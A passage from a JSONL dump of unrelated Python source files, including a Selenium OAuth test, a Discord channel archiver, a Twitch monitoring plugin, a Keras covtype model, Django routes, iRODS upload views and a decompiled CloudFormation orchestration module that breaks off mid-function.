self.connection_page.get_current_page_url()\n self.assertIn('google.com', current_url)\n\n @attr(constants.NOT_READY)\n def c40134_add_ga_account_successfully_test(self):\n self.google_permission_page = GooglePermissionPage(self.selenium)\n self.google_permission_page.goto_permission_page()\n self.google_permission_page.login_with_google_account(self.ga_user, self.ga_pwd)\n\n self._add_ga_connection()\n\n @attr(constants.NOT_READY)\n def c40137_remove_ga_account_will_revoke_oauth_permission_test(self):\n self.google_permission_page = GooglePermissionPage(self.selenium)\n self.google_permission_page.goto_permission_page()\n self.google_permission_page.login_with_google_account(self.ga_user, self.ga_pwd)\n\n self._add_ga_connection()\n self.selenium.find_element_by_css_selector('div.info.success a.btn').click()\n ga_connection_details_page = GAConnectionDetailsPage(self.selenium, 'no_need')\n ga_connection_details_page.delete_connection(password=factories.USER_PASSWORD)\n self.connection_page.find_element_by_css('div.choose-platform-list', wait_time=30)\n self.google_permission_page.goto_permission_page()\n\n def tearDown(self):\n CoreBaseSeleniumTestCase.tearDown(self)\n ga_accounts = models.AppcareAccount.objects.filter(user=self.user)\n for account in ga_accounts:\n revoke_oauth_permission(account, '')\n # if len(ga_accounts) == 0:\n # self.google_permission_page.revoke_first_app_in_permissions_list()\n\n def _add_ga_connection(self):\n self.connection_page.goto()\n self.connection_page.add_new_ga_connection()\n self.google_permission_page.choose_account_in_oauth_page(self.ga_user)\n self.google_permission_page.approve_permission_request()\n collecting_data_dialog = self.connection_page.get_collecting_data_dialog()\n self.assertIsNotNone(collecting_data_dialog)\n","sub_path":"tests/qa/cases/advana/web/old/google_analytics/oauth/test_ga_oauth.py","file_name":"test_ga_oauth.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"170613478","text":"#!/usr/bin/env python\n\n\n''' index() creates an indexed dictionary of nodes()\n search() 
searches this indexed dictionary for the author name and returns the node number\n'''\n\nimport gurk\n\n#import networkx as nx\n\ndef index():\n g = gurk.load('/var/www/vici/data/biggraph.p')\n \n nodes = g.nodes()\n gockel = {}\n #print nodes\n idx = 0\n # Indexing nodes to generate link list\n for n in nodes:\n #print('Indexing '+unicode(n))\n gockel.update([(n[0], idx,)])\n idx += 1\n \n #print('Indexing finished')\n gurk.save(gockel, '/var/www/vici/data/gockel.p')\n\n\ndef name(value):\n g = gurk.load('/var/www/vici/data/biggraph.p')\n \n i = gurk.load('/var/www/vici/data/gockel.p')\n \n #print(i.items())\n result = i[value]\n #print(g.nodes()[0])\n #print(result)\n print(g.nodes()[result])\n print(value)\n return result\n\n#index()\n#name(u'Liebig, C.')\n\n\n","sub_path":"python/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"282024851","text":"import discord\r\nfrom collections import defaultdict\r\n\r\nasync def archive_server(message):\r\n server = message.channel.guild\r\n channel = message.author\r\n\r\n #ChannelType(4) means that the server is a category, which we don't want\r\n channels = [c for c in server.channels if c.type != discord.ChannelType(4)]\r\n\r\n print('Archiving ' + server.name + '...')\r\n start_msg = f'**Archiving** ***{server.name}*** *[{{}} / {len(channels)}]*... :hourglass:'\r\n msg = await channel.send(start_msg.format(1))\r\n\r\n user_info = {}\r\n categories = defaultdict(list)\r\n for index, channel in enumerate(channels, 1):\r\n await msg.edit(content=start_msg.format(index))\r\n\r\n '''It creates issues when trying to\r\n recontruct individual users permissions,\r\n so we only save pmerissions for roles'''\r\n overwrites = {obj.id: perm._values for obj, perm in channel.overwrites.items() if obj.__class__.__name__ == 'Role'}\r\n\r\n channel_info = {\r\n 'name': channel.name,\r\n 'overwrites': overwrites\r\n }\r\n #ChannelType(0) is a text channel\r\n if channel.type == discord.ChannelType(0):\r\n messages, user_info_channel = await archive_channel(channel)\r\n user_info.update(user_info_channel)\r\n channel_info['description'] = channel.topic\r\n channel_info['messages'] = messages\r\n if channel.category is None:\r\n category = 'no-category'\r\n else:\r\n category = channel.category.name\r\n categories[category].append(channel_info)\r\n\r\n print(' Archived channel #' + channel.name)\r\n\r\n\r\n role_info = {}\r\n for role in server.roles:\r\n role_info[role.id] = {\r\n 'name': role.name,\r\n 'color': str(role.color),\r\n 'permissions': role.permissions.value\r\n }\r\n await msg.edit(content=f'**Archived** ***{server.name}*** :closed_book:')\r\n return {\r\n 'icon_url': str(server.icon_url),\r\n 'name': server.name,\r\n 'categories': dict(categories),\r\n 'user_info': user_info,\r\n 'roles': role_info}\r\n\r\nasync def archive_channel(channel):\r\n messages = []\r\n '''I'm saving all the user info here,\r\n when looping trough messages since if we\r\n were to only include the members on the server,\r\n it would cause problems if a user had sent a message\r\n and then left the server.'''\r\n user_info = {}\r\n messages_raw = await channel.history(limit=100000).flatten()\r\n for msg in messages_raw[::-1]:\r\n message = {\r\n 'content' : msg.content,\r\n 'author' : f'{msg.author.id}',\r\n 'created_at' : str(msg.created_at),\r\n 'created_at_timestamp' : msg.created_at.timestamp(),\r\n 'edited' : msg.edited_at != None,\r\n 
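The `index()`/`name()` pair above is an inverted index from node label to position in `g.nodes()`; with `enumerate()` that is a single dict comprehension. A standalone sketch over a plain list instead of the pickled graph:

```python
# label -> position lookup built in one pass, mirroring index()/name().
nodes = ["Liebig, C.", "Meyer, A.", "Smith, J."]

index = {label: pos for pos, label in enumerate(nodes)}

def lookup(label):
    pos = index[label]           # raises KeyError for unknown authors
    assert nodes[pos] == label   # round-trip check, as name() does above
    return pos

print(lookup("Meyer, A."))       # 1
```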
'attachments' : [a.url for a in msg.attachments],\r\n }\r\n user_info[msg.author.id] = {\r\n 'name': msg.author.name,\r\n 'avatar_url': str(msg.author.avatar_url)\r\n }\r\n \r\n #Checks if the user is still a member of the server\r\n member = channel.guild.get_member(msg.author.id)\r\n if member is not None:\r\n user_info['roles'] = [role.id for role in member.roles]\r\n messages.append(message)\r\n return messages, user_info","sub_path":"archive.py","file_name":"archive.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"156307331","text":"from globibot.lib.plugin import Plugin\nfrom globibot.lib.decorators import command\n\nfrom globibot.lib.helpers import parsing as p\nfrom globibot.lib.helpers import formatting as f\nfrom globibot.lib.helpers.hooks import master_only\n\nfrom . import queries as q\nfrom . import constants as c\nfrom .api import TwitchAPI\nfrom .pubsub import PubSub\n\nfrom collections import namedtuple\n\nimport asyncio\n\nMonitoredChannel = namedtuple(\n 'MonitoredChannel',\n ['id', 'name', 'server_id']\n)\n\nclass Twitch(Plugin):\n\n def load(self):\n self.client_id = self.config.get(c.CLIENT_ID_KEY)\n\n if not self.client_id:\n self.warning('Missing client id: API calls might not work')\n\n self.api = TwitchAPI(self.client_id, self.debug)\n self.pubsub = PubSub(self.debug, self.run_async)\n\n self.restore_monitored()\n\n def unload(self):\n asyncio.ensure_future(self.pubsub.shutdown())\n\n '''\n Commands\n '''\n\n twitch_prefix = p.string('!twitch')\n\n @command(twitch_prefix + p.string('status') + p.bind(p.word, 'name'))\n async def twitch_channel_status(self, message, name):\n stream, channel = await asyncio.gather(\n self.api.stream(name),\n self.api.channel(name)\n )\n\n response = '`{name}` is __{status}__'\n info = dict(\n name = channel.display_name,\n status = 'online' if stream else 'offline'\n )\n\n if stream:\n response += ': `{title}`\\n\\n🕹 {game}\\n👀 {viewers:,}\\n'\n online_info = dict(\n title = stream.channel.status,\n game = stream.game,\n viewers = stream.viewers\n )\n\n info = {**info, **online_info}\n\n await self.send_message(\n message.channel,\n response.format(**info),\n delete_after=15\n )\n\n twitch_top_prefix = twitch_prefix + p.string('top')\n\n @command(twitch_top_prefix + p.string('games')\n + p.bind(p.maybe(p.integer), 'count'))\n async def twitch_top_games(self, message, count=10):\n top_games = await self.api.top_games(count)\n\n info = [\n (top_game.game.name,\n '📺 {:,}'.format(top_game.channels),\n '👀 {:,}'.format(top_game.viewers))\n for top_game in top_games\n ]\n\n await self.send_message(\n message.channel,\n 'Top {} games on Twitch right now\\n{}'\n .format(len(top_games), f.code_block(f.pad_rows(info, ' | '))),\n delete_after=15\n )\n\n @command(twitch_top_prefix + p.string('channels')\n + p.bind(p.maybe(p.integer), 'count'))\n async def twitch_top_channels(self, message, count=10):\n streams = await self.api.top_channels(count)\n\n info = [\n (stream.channel.display_name,\n '🕹 {}'.format(stream.game),\n '👀 {:,}'.format(stream.viewers),\n stream.channel.status)\n for stream in streams\n ]\n\n await self.send_message(\n message.channel,\n 'Top {} games on Twitch right now\\n{}'\n .format(len(streams), f.code_block(f.pad_rows(info, ' | '))),\n delete_after=15\n )\n\n @command(\n twitch_prefix + p.string('monitor') + p.bind(p.word, 'name'),\n master_only\n )\n async def twitch_monitor(self, message, name):\n channel = await 
self.api.channel(name)\n\n with self.transaction() as trans:\n trans.execute(q.add_monitored, dict(\n name = channel.name,\n server_id = message.server.id\n ))\n\n self.run_async(self.monitor_forever(channel.name, message.server))\n\n await self.send_message(\n message.channel,\n 'Now monitoring `{}`'.format(channel.display_name),\n delete_after=15\n )\n\n @command(\n twitch_prefix + p.string('unmonitor') + p.bind(p.word, 'name'),\n master_only\n )\n async def twitch_unmonitor(self, message, name):\n channel = await self.api.channel(name)\n\n await self.pubsub.unsubscribe(\n PubSub.Topics.VIDEO_PLAYBACK(channel.name),\n message.server.id\n )\n\n with self.transaction() as trans:\n trans.execute(q.remove_monitored, dict(\n name = channel.name,\n server_id = message.server.id\n ))\n\n await self.send_message(\n message.channel,\n 'Stopped monitoring `{}`'.format(channel.display_name),\n delete_after=15\n )\n\n @command(twitch_prefix + p.string('monitored'), master_only)\n async def monitored(self, message):\n with self.transaction() as trans:\n trans.execute(q.get_monitored)\n monitored = [MonitoredChannel(*row) for row in trans.fetchall()]\n\n channels = [\n channel.name for channel in monitored\n if str(channel.server_id) == message.server.id\n ]\n\n await self.send_message(\n message.channel,\n 'I\\'m currently monitoring the following channels:\\n{}'\n .format(f.code_block(channels)),\n delete_after=15\n )\n\n '''\n Details\n '''\n\n async def monitor_forever(self, name, server):\n self.info('Monitoring: {}'.format(name))\n\n channel = await self.api.channel(name)\n events = await self.pubsub.subscribe(\n PubSub.Topics.VIDEO_PLAYBACK(channel.name),\n server.id\n )\n\n async for event in events:\n self.debug(event)\n if event['type'] == 'stream-up':\n await self.send_message(\n server.default_channel,\n '`{}` just went live!\\n{}'\n .format(channel.display_name, channel.url)\n )\n if event['type'] == 'stream-down':\n await self.send_message(\n server.default_channel,\n '`{}` just went offline 😢'.format(channel.display_name)\n )\n\n self.info('Stopped monitoring: {}'.format(name))\n\n def restore_monitored(self):\n with self.transaction() as trans:\n trans.execute(q.get_monitored)\n monitored = [MonitoredChannel(*row) for row in trans.fetchall()]\n\n for channel in monitored:\n server = next(\n serv for serv in self.bot.servers\n if serv.id == str(channel.server_id)\n )\n self.run_async(self.monitor_forever(channel.name, server))\n","sub_path":"bot/plugins/twitch/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":6760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"617890928","text":"#%%\nimport tensorflow as tf\nimport numpy as np\nfrom sklearn.datasets import fetch_covtype\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom tensorflow import keras\nfrom tensorflow.python.keras import layers\n\n(data, target) = fetch_covtype(return_X_y=True)\n\nscaler = preprocessing.StandardScaler().fit(X=data)\n\ndata = scaler.transform(data)\n\nx_train, x_test, y_train, y_test = train_test_split(data, target, shuffle=True, test_size=0.2)\n\ny_train_onehot = tf.one_hot(y_train - 1, depth=7)\ny_test_onehot = tf.one_hot(y_test - 1, depth=7)\ntarget_onehot = tf.one_hot(target - 1, depth=7)\n\nBATCH_SIZE = 64\nEPOCHS = 30\nSTEPS_PER_EPOCH = 6000\n\ntrainset = tf.data.Dataset.from_tensor_slices((x_train, y_train_onehot))\ntrainset = trainset.batch(BATCH_SIZE).repeat()\n\ntestset = 
tf.data.Dataset.from_tensor_slices((x_test, y_test_onehot))\ntestset = testset.batch(BATCH_SIZE).repeat()\n\nmodel = keras.Sequential([\n layers.Dense(units=64, activation='relu', input_shape=(54,)),\n layers.Dense(units=64, activation='relu'),\n layers.Dense(units=32, activation='relu'),\n layers.Dense(units=16, activation='relu'),\n layers.Dense(units=7, activation='softmax')\n])\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer=tf.train.AdamOptimizer(0.01),\n metrics=['accuracy'])\n\nearly_stop = tf.keras.callbacks.EarlyStopping(\n patience=5, \n monitor='val_loss', \n mode='auto'\n)\n\nckpt_callback = tf.keras.callbacks.ModelCheckpoint(\n \"./checkpoint/cp-{epoch:04d}.ckpt\",\n verbose=1,\n save_weights_only=True,\n period=10\n)\n\ntb_callback = tf.keras.callbacks.TensorBoard(\n log_dir='./log',\n batch_size=BATCH_SIZE\n)\n\nclass PrintLoss(keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs):\n print('Epoch: {:03d} - loss: {:.5f} - acc: {:.5f} - \\\n val_loss: {:.5f} - val_acc: {:.5f}'.format(epoch + 1, logs['loss'], logs['acc'], logs['val_loss'], logs['val_acc']))\n\nhistory = model.fit(\n trainset,\n epochs=EPOCHS,\n steps_per_epoch=STEPS_PER_EPOCH,\n validation_data=testset,\n validation_steps=STEPS_PER_EPOCH // 4,\n verbose=0,\n callbacks=[PrintLoss()]\n)\n\n# model.fit(\n# x=data,\n# y=target_onehot,\n# epochs=EPOCHS,\n# shuffle=True,\n# validation_split=0.2,\n# steps_per_epoch=STEPS_PER_EPOCH,\n# validation_steps=STEPS_PER_EPOCH // 4,\n# callbacks=[ckpt_callback]\n# )","sub_path":"code/DNN/keras-covtype.py","file_name":"keras-covtype.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"556504017","text":"\"\"\"DataShare URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
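`STEPS_PER_EPOCH` in the covtype script above is hard-coded to 6000; for a `.repeat()`-ed `tf.data` pipeline the conventional value is `ceil(n_samples / batch_size)`, so one "epoch" covers the training split roughly once. A quick helper and the numbers for this dataset (581,012 rows, 80/20 split):

```python
import math

def steps_per_epoch(n_samples, batch_size):
    # ceil so the final partial batch is still visited each epoch
    return math.ceil(n_samples / batch_size)

n_train = int(581012 * 0.8)                 # covtype train split
print(steps_per_epoch(n_train, 64))         # 7263
print(steps_per_epoch(n_train, 64) // 4)    # matching validation_steps
```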
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom App import views\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^$',views.home),\n url(r'^logval',views.logval,name=\"logval\"),\n url(r'^vb',views.vb,name=\"vb\"),\n url(r'^dataownlog',views.dataownlog,name=\"dataownlog\"),\n url(r'^approved',views.approved,name=\"approved\"),#\n url(r'^otherslog',views.otherslog,name=\"otherslog\"),\n url(r'^loginval',views.loginval,name=\"loginval\"),\n url(r'^cloudpage',views.cloudpage,name=\"cloudpage\"),\n url(r'^inbpage',views.inbpage,name=\"inbpage\"),\n url(r'^newadmin',views.newadmin,name=\"newadmin\"),\n url(r'^signup',views.signup,name=\"signup\"),\n url(r'^data',views.data,name=\"data\"),\n url(r'^duvalu',views.duvalu,name=\"duvalu\"),\n url(r'^duind',views.duind,name=\"duind\"),\n url(r'^ind',views.ind,name=\"ind\"),\n url(r'^dq1',views.dq1,name=\"dq1\"),\n url(r'^dq2',views.dq2,name=\"dq2\"),\n url(r'^valu',views.valu,name=\"valu\"),\n url(r'^download',views.download,name=\"download\"),\n url(r'^sen',views.sen,name=\"sen\"),\n url(r'^newsen',views.newsen,name=\"newsen\"),\n url(r'^log',views.log,name=\"log\"),\n url(r'^sig',views.sig,name=\"sig\"),\n url(r'^verify',views.verify,name=\"verify\"),\n url(r'^reqfile',views.reqfile,name=\"reqfile\"),\n url(r'^deprole',views.deprole,name=\"deprole\"),\n url(r'^selected',views.selected,name=\"selected\"),\n url(r'^accesspolicy',views.accesspolicy,name=\"accesspolicy\"),\n url(r'^saving',views.saving,name=\"saving\"),\n]\n","sub_path":"DataShare/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"353236811","text":"import json\nimport os\nimport string\nfrom django.http import HttpResponse, HttpResponseRedirect\n\nfrom irods.session import iRODSSession\nfrom irods.exception import CollectionDoesNotExist\n\nfrom django_irods.icommands import SessionException\nfrom hs_core import hydroshare\nfrom hs_core.views.utils import authorize, upload_from_irods, ACTION_TO_AUTHORIZE\nfrom hs_core.hydroshare import utils\n\ndef search_ds(coll):\n store = {}\n file = []\n folder = []\n if coll.data_objects:\n for files in coll.data_objects:\n file.append(files.name)\n if coll.subcollections:\n for folders in coll.subcollections:\n folder.append(folders.name)\n\n store['files'] = file\n store['folder'] = folder\n return store\n\ndef check_upload_files(resource_cls, fnames_list):\n file_types = resource_cls.get_supported_upload_file_types()\n valid = False\n ext = ''\n if file_types == \".*\":\n valid = True\n else:\n for fname in fnames_list:\n ext = os.path.splitext(fname)[1].lower()\n if ext == file_types:\n valid = True\n else:\n for index in range(len(file_types)):\n file_type_str = file_types[index].strip().lower()\n if file_type_str == \".*\" or ext == file_type_str:\n valid = True\n break\n\n return (valid, ext)\n\n# Create your views here.\ndef login(request):\n if request.method == 'POST':\n port = int(request.POST['port'])\n user = str(request.POST['username'])\n password = str(request.POST['password'])\n zone = str(request.POST['zone'])\n host = str(request.POST['host'])\n datastore = \"/%s/home/%s\" % (zone, user)\n\n response_data = {}\n\n irods_sess = iRODSSession(user=user, password=password, zone=zone, host=host, port=port)\n\n try:\n irods_sess.collections.get(datastore)\n except CollectionDoesNotExist:\n 
response_data['irods_loggedin'] = False\n response_data['login_message'] = 'iRODS login failed'\n response_data['irods_file_names'] = ''\n response_data['error'] = \"iRODS collection does not exist\"\n irods_sess.cleanup()\n return HttpResponse(\n json.dumps(response_data),\n content_type=\"application/json\"\n )\n else:\n response_data['user'] = user\n response_data['password'] = password\n response_data['port'] = port\n response_data['host'] = host\n response_data['zone'] = zone\n response_data['datastore'] = datastore\n response_data['irods_loggedin'] = True\n response_data['irods_file_names'] = ''\n irods_sess.cleanup()\n return HttpResponse(\n json.dumps(response_data),\n content_type = \"application/json\"\n )\n else:\n return HttpResponse(\n json.dumps({\"error\": \"Not POST request\"}),\n content_type=\"application/json\"\n )\n\ndef store(request):\n \"\"\"\n Get file hierarchy (collection of subcollections and data objects) for the requested directory\n in an iRODS zone the requested user has logged in.\n It is invoked by an AJAX call, so it returns json object that holds content for files and folders\n under the requested directory/collection/subcollection\n \"\"\"\n return_object = {}\n irods_sess = iRODSSession(user=str(request.POST['user']), password=str(request.POST['password']),\n zone=str(request.POST['zone']), host=str(request.POST['host']),\n port=int(request.POST['port']))\n datastore = str(request.POST['store'])\n coll = irods_sess.collections.get(datastore)\n store = search_ds(coll)\n\n return_object['files'] = store['files']\n return_object['folder'] = store['folder']\n jsondump = json.dumps(return_object)\n irods_sess.cleanup()\n return HttpResponse(\n jsondump,\n content_type = \"application/json\"\n )\n\ndef upload(request):\n if request.method == 'POST':\n file_names = str(request.POST['upload'])\n fnames_list = string.split(file_names, ',')\n\n resource_cls = hydroshare.check_resource_type(request.POST['res_type'])\n valid, ext = check_upload_files(resource_cls, fnames_list)\n\n response_data = {}\n if valid:\n response_data['file_type_error'] = ''\n response_data['irods_file_names'] = file_names\n # get selected file names without path for informational display on the page\n response_data['irods_sel_file'] = ', '.join(os.path.basename(f.rstrip(os.sep)) for f in fnames_list)\n homepath = fnames_list[0]\n response_data['irods_federated'] = utils.is_federated(homepath)\n else:\n response_data['file_type_error'] = \"Invalid file type: {ext}\".format(ext=ext)\n response_data['irods_file_names'] = ''\n response_data['irods_sel_file'] = 'No file selected.'\n\n return HttpResponse(\n json.dumps(response_data),\n content_type = \"application/json\"\n )\n else:\n return HttpResponse(\n json.dumps({\"error\": \"Not POST request\"}),\n content_type=\"application/json\"\n )\n\ndef upload_add(request):\n # add irods file into an existing resource\n res_id = request.POST['res_id']\n resource, _, _ = authorize(request, res_id, needed_permission=ACTION_TO_AUTHORIZE.EDIT_RESOURCE)\n res_files = request.FILES.getlist('files')\n extract_metadata = request.REQUEST.get('extract-metadata', 'No')\n extract_metadata = True if extract_metadata.lower() == 'yes' else False\n irods_fnames = request.POST.get('irods_file_names', '')\n irods_fnames_list = string.split(irods_fnames, ',')\n res_cls = resource.__class__\n\n # TODO: read resource type from resource, not from input file \n valid, ext = check_upload_files(res_cls, irods_fnames_list)\n source_names = []\n irods_federated = False\n if 
not valid:\n request.session['file_type_error'] = \"Invalid file type: {ext}\".format(ext=ext)\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n else:\n homepath = irods_fnames_list[0]\n # TODO: this should happen whether resource is federated or not\n irods_federated = utils.is_federated(homepath)\n if irods_federated:\n source_names = irods_fnames.split(',')\n else:\n user = request.POST.get('irods-username')\n password = request.POST.get(\"irods-password\")\n port = request.POST.get(\"irods-port\")\n host = request.POST.get(\"irods-host\")\n zone = request.POST.get(\"irods-zone\")\n try:\n upload_from_irods(username=user, password=password, host=host, port=port,\n zone=zone, irods_fnames=irods_fnames, res_files=res_files)\n except SessionException as ex:\n request.session['validation_error'] = ex.stderr\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n\n try:\n utils.resource_file_add_pre_process(resource=resource, files=res_files, user=request.user,\n extract_metadata=extract_metadata, \n source_names=source_names, folder=None)\n except hydroshare.utils.ResourceFileSizeException as ex:\n request.session['file_size_error'] = ex.message\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n\n except (hydroshare.utils.ResourceFileValidationException, Exception) as ex:\n request.session['validation_error'] = ex.message\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n\n try:\n hydroshare.utils.resource_file_add_process(resource=resource, files=res_files, \n user=request.user,\n extract_metadata=extract_metadata,\n source_names=source_names, folder=None)\n\n except (hydroshare.utils.ResourceFileValidationException, Exception) as ex:\n if ex.message:\n request.session['validation_error'] = ex.message\n elif ex.stderr:\n request.session['validation_error'] = ex.stderr\n except SessionException as ex:\n request.session['validation_error'] = ex.stderr\n\n request.session['resource-mode'] = 'edit'\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n\n","sub_path":"irods_browser_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"380463145","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/sanhehu/Documents/GitHub/troposphere_mate-project/troposphere_mate/core/orchestration.py\n# Compiled at: 2019-08-08 16:17:45\n# Size of source mod 2**32: 9185 bytes\n\"\"\"\nImplement a Orchestration Framework.\n\"\"\"\ntry:\n from typing import List, Tuple, Dict, Type\nexcept:\n pass\n\nimport attr\nfrom collections import OrderedDict\nfrom pathlib_mate import PathCls as Path\nfrom .mate import AWSObject, Template\nfrom .canned import Canned\n\ndef resolve_pipeline(plan):\n \"\"\"\n\n :type plan: List[Tuple[str, str]]\n :param plan: [(can_id, tag), ...]\n\n :rtype: List[Tuple[List[str], str]]]\n \"\"\"\n pipeline_change_set = list()\n job = ([], None)\n previous_env = None\n for tier_name, tier_env in plan:\n if tier_env != previous_env:\n pipeline_change_set.append(job)\n previous_env = tier_env\n job = ([tier_name], tier_env)\n else:\n job[0].append(tier_name)\n\n pipeline_change_set.append(job)\n pipeline_change_set = pipeline_change_set[1:]\n dct = dict()\n pipeline = list()\n for tier_list, tier_env in pipeline_change_set:\n if tier_env in dct:\n dct[tier_env].extend(tier_list)\n else:\n dct[tier_env] 
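`check_upload_files()` above mixes a direct `ext == file_types` comparison (where `file_types` may be a list) with an index-based loop, and a single matching file marks the whole upload valid. A stricter standalone sketch that normalizes the allowed set once and requires every filename to pass; the names are illustrative, not the app's API:

```python
# Extension validation with the allowed types normalized up front.
# ".*" anywhere means "accept everything". Note this is stricter than
# check_upload_files() above, which validates the whole list as soon
# as any one filename matches.
import os

def validate_extensions(filenames, allowed):
    if allowed == ".*":
        return True, ""
    allowed = {t.strip().lower() for t in allowed}
    if ".*" in allowed:
        return True, ""
    for name in filenames:
        ext = os.path.splitext(name)[1].lower()
        if ext not in allowed:
            return False, ext  # report the offending extension
    return True, ""

print(validate_extensions(["a.tif", "b.TIF"], [".tif"]))  # (True, '')
print(validate_extensions(["a.tif", "b.png"], [".tif"]))  # (False, '.png')
```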
= tier_list\n pipeline.append((list(dct[tier_env]), tier_env))\n\n return pipeline\n\n\nclass ResourceFilter(object):\n\n def __init__(self, allowed_stack_id_list):\n self.allowed_stack_id_list = allowed_stack_id_list\n\n def filter(self, resource, template):\n \"\"\"\n Check if we want to keep this resource in the cloudformation.\n If ``True``, we keep it. if ``False`` we call\n ``Template.remove_resource(resource)`` to remove it,\n\n :type resource: AWSObject\n :type template: Template\n :rtype: bool\n \"\"\"\n if resource.resource_type == 'AWS::CloudFormation::Stack':\n if resource.title in self.allowed_stack_id_list:\n return True\n else:\n return False\n else:\n return True\n\n\n@attr.s\nclass CanLabel(object):\n __doc__ = '\\n A wrapper around a ``troposphere_mate.Canned``. It defines the metadata\\n about the ``Canned``\\n\\n **中文文档**\\n\\n 在 ``Canned`` 之外的进一层包装. ``logic_id`` 是当 ``Canned`` 封装的 Template 会\\n 被作为 Nested Stack 时起作用的. 因为 ``troposphere`` 实现的 Template 可能在其他\\n Template 中作为 ``AWS::CloudFormation::Stack`` Resource 使用. 作为\\n Nested Stack 是不知道 Master Stack 中的 Resource Logic Id 的. ``filename``\\n 则是指定了实体文件的文件名. 因为 ``Template`` 本身只关注模板数据, 不关注模板文件.\\n\\n CanLabel 实现了 Y 轴上的编排.\\n '\n logic_id = attr.ib()\n can_class = attr.ib()\n filename = attr.ib()\n\n\n@attr.s\nclass ConfigData(object):\n __doc__ = '\\n **中文文档**\\n\\n 一串的 CanLabel (本质上是一串原子的 Nested Stack, 要么该 Stack 中的资源被全部\\n 创建, 要么全部不被创建) 构成了一个架构的设计. 而这个架构的设计可能被部署到不同的环境中,\\n 在不同的环境中, 配置数据可能不同, 实际被部署的 Nested Stack 的数量也可能不同.\\n\\n ConfigData 提供了在不同环境下 (用 env_tag 做区分) 的配置数据.\\n\\n ConfigData 实现了 X 轴上的编排.\\n '\n env_tag = attr.ib()\n data = attr.ib()\n\n\n@attr.s\nclass Note(object):\n can_id = attr.ib()\n env_tag = attr.ib()\n\n\n@attr.s\nclass TemplateFile(object):\n __doc__ = '\\n\\n **中文文档**\\n\\n 包含了 ``troposphere_mate.Template`` 的实例 以及实际的文件路径 (绝对路径)\\n '\n template = attr.ib()\n filepath = attr.ib()\n\n @filepath.validator\n def check_filepath(self, attribute, value):\n if not Path(value).is_absolute():\n raise ValueError(\"You have to use absolute path for 'TemplateFile.filepath`!\")\n\n def make_file(self, json_or_yml='json'):\n self.template.to_file((self.filepath), json_or_yml=json_or_yml)\n\n\n@attr.s\nclass ExecutionJob(object):\n __doc__ = '\\n **中文文档**\\n\\n 每个 ExecutionJob 对应一次 ``aws cloudformation deploy`` 命令的执行.\\n 本质上一个 ExecutionJob 包含了一串最终的 Template 文件实体. 所以我们需要知道\\n Master Template 的路径, 以及所有的 Template 的数据以及路径.\\n '\n master_can = attr.ib()\n master_template_path = attr.ib()\n template_file_list = attr.ib()\n\n def execute(self):\n self.master_can.dump_shell_script_json_config_file()\n self.master_can.dump_cloudformation_json_config_file()\n for template_file in self.template_file_list:\n template_file.make_file(json_or_yml='json')\n\n\nclass Orchestration(object):\n __doc__ = '\\n **中文文档**\\n\\n Orchestration 的本质是对 CanLabel 和 ConfigData 进行编排. 
使用:\\n ``CanLabel.logic_id`` 和 ``ConfigData.env_tag`` 指定了编排中的某个最小单元,\\n 通过指定云架构部署的顺序, 最终实现编排.\\n\\n '\n\n def __init__(self, master_canlabel_id, canlabel_list, config_data_list, notes):\n \"\"\"\n\n :type master_canlabel_id: str\n\n :type canlabel_list: List[CanLabel]\n\n :type config_data_list: List[ConfigData]\n\n :type notes: List[Note]\n \"\"\"\n self.master_canlabel_id = master_canlabel_id\n self.canlabel_mapper = OrderedDict([(canlabel.logic_id, canlabel) for canlabel in canlabel_list])\n self.config_data_mapper = OrderedDict([(config_data.env_tag, config_data) for config_data in config_data_list])\n self.notes = notes\n\n def plan(self, temp_dir):\n pipeline = resolve_pipeline([(note.can_id, note.env_tag) for note in self.notes])\n nested_can_mapper = dict()\n returned_list = list()\n STOP_AT_IND = 4\n counter = 0\n for can_id_list, env_tag in pipeline:\n counter += 1\n deploy_workspace_dir = Path(temp_dir, '{}-{}'.format(str(counter).zfill(3), env_tag))\n deploy_workspace_dir.mkdir(parents=True, exist_ok=True)\n returned_list.append(deploy_workspace_dir)\n template_file_list = list()\n config_data = self.config_data_mapper[env_tag].data\n master_can_label = self.canlabel_mapper[self.master_canlabel_id]\n master_can = (master_can_label.can_class)(**config_data)\n 